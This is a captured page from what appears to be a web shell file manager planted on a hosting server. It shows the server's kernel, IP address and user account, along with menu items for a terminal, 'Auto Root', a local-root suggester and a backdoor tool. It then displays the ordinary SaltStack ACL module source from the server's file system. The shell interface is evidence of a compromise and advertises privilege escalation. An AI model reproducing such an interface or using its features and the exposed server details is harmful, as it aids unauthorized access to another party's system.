Linux server.edchosting.com 4.18.0-553.79.1.lve.el7h.x86_64 #1 SMP Wed Oct 15 16:34:46 UTC 2025 x86_64
LiteSpeed
Server IP : 75.98.162.185 & Your IP : 216.73.216.163
Domains :
Cant Read [ /etc/named.conf ]
User : goons4good
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
usr /
lib /
python3.6 /
site-packages /
salt /
acl /
Delete
Unzip
Name
Size
Permission
Date
Action
__pycache__
[ DIR ]
drwxr-xr-x
2022-10-11 05:09
__init__.py
1.7
KB
-rw-r--r--
2022-05-16 09:16
Save
Rename
""" The acl module handles publisher_acl operations Additional information on publisher_acl can be found by reading the salt documentation: https://docs.saltproject.io/en/latest/ref/publisheracl.html """ # Import python libraries import salt.utils.stringutils class PublisherACL: """ Represents the publisher ACL and provides methods to query the ACL for given operations """ def __init__(self, blacklist): self.blacklist = blacklist def user_is_blacklisted(self, user): """ Takes a username as a string and returns a boolean. True indicates that the provided user has been blacklisted """ return not salt.utils.stringutils.check_whitelist_blacklist( user, blacklist=self.blacklist.get("users", []) ) def cmd_is_blacklisted(self, cmd): # If this is a regular command, it is a single function if isinstance(cmd, str): cmd = [cmd] for fun in cmd: if not salt.utils.stringutils.check_whitelist_blacklist( fun, blacklist=self.blacklist.get("modules", []) ): return True return False def user_is_whitelisted(self, user): return salt.utils.stringutils.check_whitelist_blacklist( user, whitelist=self.blacklist.get("users", []) ) def cmd_is_whitelisted(self, cmd): # If this is a regular command, it is a single function if isinstance(cmd, str): cmd = [cmd] for fun in cmd: if salt.utils.stringutils.check_whitelist_blacklist( fun, whitelist=self.blacklist.get("modules", []) ): return True return False